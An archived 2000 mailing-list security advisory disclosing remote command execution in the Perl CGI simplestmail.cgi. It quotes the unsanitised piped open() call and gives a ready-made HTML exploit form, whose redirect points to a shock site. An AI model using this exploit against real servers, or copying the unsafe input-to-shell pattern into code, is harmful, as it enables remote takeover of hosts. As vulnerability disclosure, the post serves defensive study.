OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Insecure input validation in simplestmail.cgi (remote command execution)
From: rpc (hCKZ.ORG)
Date: Mon Dec 11 2000 - 08:46:39 CST


Hi Again,

simplestmail.cgi is another Perl cgi written by "Tammie's HUSBAND" Leif Wright.

It's available from:
http://www.conservatives.net/atheist/scripts/index.html?simplestmail

The code is self explanatory:

----code snippet----
$youremail = $contents_by_name{'MyEmail'};
open (MAIL, "|$mailprog $youremail") || die "Can't open $mailprog!\n";
-----------------

Exploitation is straight forward:

<html>
<form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>
Command: <input type=text name=MyEmail value=";">
<input type=hidden name=redirect value="http://goatse.cx">
<input type=submit name=submit value="run">
</form>
</html>

--rpc